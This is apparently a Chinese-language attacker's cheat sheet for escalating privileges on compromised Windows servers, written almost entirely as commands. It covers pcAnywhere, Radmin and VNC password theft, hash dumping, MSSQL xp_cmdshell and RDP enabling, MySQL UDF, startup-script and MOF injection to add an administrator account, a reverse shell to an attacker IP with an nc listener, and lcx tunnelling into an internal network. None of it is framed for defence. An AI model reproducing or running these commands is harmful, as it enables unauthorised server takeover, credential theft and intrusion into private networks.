远程管理软件提权
pcanywhere
访问pcanywhere默认安装目录
下载用户配置文件
通过破解用户密码文件
一、Pcanywhere
1、上马------点击pcanywhere------host文件-----找到PCA.adim.CIF下载(下载的是名为admin的用户文件)
2、使用工具pcanywhere 选择下载的文件,爆出密码
3、使用pcanywhere连接
二、radmin提权
通过端口扫描 扫描4899端口
上传radmin.asp木马读取radmin的加密密文
使用工具连接
三、vnc提权
通过读到注册表十进制数转换成十六进制数
破解十六进制数得到密码
vncx4.exe –W 回车
输入转换后的十六进制数
连接vnc
四、常见的溢出提权
巴西烤肉, pr等
步骤:
1、通过信息搜集查看服务器打了哪些补丁
2、根据未打的补丁漏洞进行利用即可
五、破解hash提权
上传pwdump.exe远程获取hash值
拿到lc5彩虹表破解
即可得到管理员密码
需要管理员权限方可执行读取hash操作
六、启动项提权
前提写入的目录需要写入权限
将批处理文件上传到开机启动项目录等待管理员重启即可
七、数据库提权
SQLserver数据库提权
mysql数据库提权
需要具备数据库管理员权限才可以执行提权操作
1、msSQL提权
1.1
安装组件
开启3389
创建用户
提升权限
完成
sa账号的获取,查看config.asp、conn.asp等文件
1.2、msSQL安装执行命令组件
安装cmd_shell组件
exec sp_configure ‘show advanced options’, 1
go
reconfigure
go
exec sp_configure ‘xp_cmdshell’, 1
go
reconfigure
go
1.3、3389操作语句
开启3389
exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--
关闭3389
exec
master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--
1.4、删除cmd_shell组件
exec sp_configure ‘show advancer options’, 1
go
reconfigure
go
exec sp_configure xp_cmdshell; 0
go
reconfigure
go
2、mysql数据库提权
udf提权
启动项提权
maf提权
反链端口提权
2.1、udf提权
获取到对方的mysql数据库下的root账号密码
1、查看网站源码里面数据库配置文件
(inc、conn、config.sql、common、data等)
2、查看数据库安装路径下的user.myd(/data/mysql)
3、暴力破解mysql密码,破解3306端口入侵
udf提权原理
通过root权限导出udf.dll到系统目录下,可以通过udf.dll调用执行cmd
c:\winnt\udf.dll 2000
c:\windows\udf.dll 2003
现在基本上win的服务器就这两个导出udf.dll
5.1以上版本需要导出到mysql安装目录lib\plugin\
create function cmdshell returns string soname ‘udf.dll’
select cmdshell (‘net user abc abc /add’);
select cmdshell (‘net localgroup administrators abc /add’);
drop function cmdshell; 删除函数
2.2、启动项提权
1、查看我们进入数据库中有什么数据表
mysql>show tables;
默认情况下,test中没有任何表的存在
以下为关键部分
2、在TEST数据库下创建一个新的表
mysql>create table a (cmd text);
此时创建了一个新表,表名为a,表中只存放一个字段名为cmd的text文件
3、在表中插入内容
mysql>insert into a values (“set wshshell=createobject(“”wscript.shell””)”)
mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);
mysql>insert into a values (“b=wshshell.ru (“”cmd.exe /c net localgroup administrators 1 /add”,0)”);
注意,双引号和括号以及后面的“0”一定要输入,用这三条命令来建立一个VBS的脚本程序。
4、mysql>select * from a;
此时表中有三行数据,就是前面的VBS的脚本程序
5、输出表为一个VBS的脚本文件
mysql>select * from a into outfile “c://document//administrator//[开始]菜单//程序//启动//a.vbs”;
6、重启
2.3mof提权
第一种方法:
上传mof.php
输入相关信息,执行命令,提权
第二种方法:
上传x.mof
使用select命令导出到正确位置
select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’
允许外部地址使用root用户连接的SQL语句
grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;
八、反链端口提权
利用mysql客户端工具连接mysql服务器,然后执行以下操作
1、执行命令
mysql.exe –h 172.16.10.11 –uroot –p
enter password:
mysql>\.c”\mysql.txt
mysql>select backshell(“yourip”,2010);
2、本地监听反弹的端口
nc.exe –vv –l –p 2010
成功后,会获得一个system权限的cmdshell
九、内网端口转发
内网主机输入命令
lcx.exe –slave 外网ip 外网端口 内网ip 内网端口
lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389
外网主机输入命令
lcx.exe –listen 111 1311
开启3389
使用
批处理文件开3389
使用sql语句开3389
使用exe开3389
使用vb开3389
、